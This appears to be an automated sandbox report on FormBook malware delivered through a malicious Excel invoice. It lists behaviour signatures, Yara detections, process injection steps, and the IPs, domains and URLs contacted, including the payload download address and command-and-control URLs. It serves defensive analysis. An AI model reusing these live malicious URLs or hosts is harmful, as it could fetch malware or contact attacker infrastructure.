Source: C:\Users\Public\vbc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 9.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000000.480207379.0000000009780000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.495167192.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.461391502.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.660726182.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.660761773.0000000000170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.461058608.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.495256072.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.466306106.0000000003456000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.660793447.00000000001D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.495227557.0000000000210000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.487261064.0000000009780000.00000040.00020000.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 9.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000000.480207379.0000000009780000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.495167192.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.461391502.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.660726182.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.660761773.0000000000170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.461058608.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.495256072.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.466306106.0000000003456000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.660793447.00000000001D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.495227557.0000000000210000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.487261064.0000000009780000.00000040.00020000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 528789 Sample: PROFORMA INVOICE.xlsx Startdate: 25/11/2021 Architecture: WINDOWS Score: 100 47 www.getjoyce.net 2->47 71 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->71 73 Found malware configuration 2->73 75 Malicious sample detected (through community Yara rule) 2->75 77 18 other signatures 2->77 10 EQNEDT32.EXE 12 2->10         started        15 EXCEL.EXE 33 29 2->15         started        signatures3 process4 dnsIp5 49 107.173.229.133, 49167, 80 AS-COLOCROSSINGUS United States 10->49 41 C:\Users\user\AppData\Local\...\vbc[1].exe, PE32 10->41 dropped 43 C:\Users\Public\vbc.exe, PE32 10->43 dropped 87 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->87 17 vbc.exe 3 10->17         started        45 C:\Users\user\...\~$PROFORMA INVOICE.xlsx, data 15->45 dropped file6 signatures7 process8 file9 37 C:\Users\user\AppData\...\nLOlOTZpUHFzC.exe, PE32 17->37 dropped 39 C:\Users\user\AppData\Local\...\tmp5580.tmp, XML 17->39 dropped 63 Uses schtasks.exe or at.exe to add and modify task schedules 17->63 65 Adds a directory exclusion to Windows Defender 17->65 67 Tries to detect virtualization through RDTSC time measurements 17->67 69 Injects a PE file into a foreign processes 17->69 21 vbc.exe 17->21         started        24 powershell.exe 6 17->24         started        26 schtasks.exe 17->26         started        signatures10 process11 signatures12 79 Modifies the context of a thread in another process (thread injection) 21->79 81 Maps a DLL or memory area into another process 21->81 83 Sample uses process hollowing technique 21->83 85 Queues an APC in another process (thread injection) 21->85 28 explorer.exe 21->28 injected process13 dnsIp14 51 www.franquiciasexclusivas.tienda 108.167.189.66, 49170, 80 UNIFIEDLAYER-AS-1US United States 28->51 53 deboraverdian.com 151.106.119.46, 49169, 80 PLUSSERVER-ASN1DE Germany 28->53 55 8 other IPs or domains 28->55 89 System process connects to network (likely due to code injection or exploit) 28->89 32 svchost.exe 28->32         started        35 autofmt.exe 28->35         started        signatures15 process16 signatures17 57 Modifies the context of a thread in another process (thread injection) 32->57 59 Maps a DLL or memory area into another process 32->59 61 Tries to detect virtualization through RDTSC time measurements 32->61
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
192.0.78.25
 noyoucantridemyonewheel.com United States
2635 AUTOMATTICUS true
151.106.119.46
 deboraverdian.com Germany
61157 PLUSSERVER-ASN1DE true
151.101.66.159
 trashwasher.com United States
54113 FASTLYUS true
34.102.136.180
 hacticum.com United States
15169 GOOGLEUS false
107.173.229.133
 unknown United States
36352 AS-COLOCROSSINGUS true
108.167.189.66
 www.franquiciasexclusivas.tienda United States
46606 UNIFIEDLAYER-AS-1US true

Contacted Domains

Name IP Active
hacticum.com 34.102.136.180 true
trashwasher.com 151.101.66.159 true
noyoucantridemyonewheel.com 192.0.78.25 true
www.franquiciasexclusivas.tienda 108.167.189.66 true
deboraverdian.com 151.106.119.46 true
www.trashwasher.com unknown unknown
www.noyoucantridemyonewheel.com unknown unknown
www.digipoint-entertainment.com unknown unknown
www.deboraverdian.com unknown unknown
www.hacticum.com unknown unknown
www.getjoyce.net unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.hacticum.com/ht08/?br2=NsDQ5dhzDoz6b+QTI369eNhdKzsm5WWXC1g1e1LkMaMU2QVIAgjIadv0XRSqFt55bwDZkw==&fDKD5Z=lbLdxBhXWNSHTR false
  • Avira URL Cloud: safe
 unknown
http://107.173.229.133/90009/vbc.exe true
  • Avira URL Cloud: safe
 unknown
www.septemberstockevent200.com/ht08/ true
  • Avira URL Cloud: safe
 low
http://www.deboraverdian.com/ht08/?br2=hqaFuomov4HTN7lxwLOQI0L+zLU3A1JjC3kLHHHa91aVMp4VPmQJeUa+LGH249kypYugsQ==&fDKD5Z=lbLdxBhXWNSHTR true
  • Avira URL Cloud: malware
 unknown
http://www.franquiciasexclusivas.tienda/ht08/?br2=Wj4EIVjQBNu/bqqxJYrWPsWLHRdbpU/VGyAVKo6IxXme9nj69vNHjvuNthqXxUIvimxQ8w==&fDKD5Z=lbLdxBhXWNSHTR true
  • Avira URL Cloud: safe
 unknown
http://www.trashwasher.com/ht08/?br2=uW1sPHtBOFcvSjOqiE7uYKY6CRw967TpF9DAp4EO6MgnVSdl1zAyFQ+ogdnPtirgP8DfTg==&fDKD5Z=lbLdxBhXWNSHTR true
  • Avira URL Cloud: safe
 unknown
http://www.noyoucantridemyonewheel.com/ht08/?br2=60BX3p/jKqTFfatzdk67FZjwUvooQvGFnODgWFokXaJ7H/RmjwYG/Htt7Nd+S+ztCPQGkw==&fDKD5Z=lbLdxBhXWNSHTR true
  • Avira URL Cloud: safe
 unknown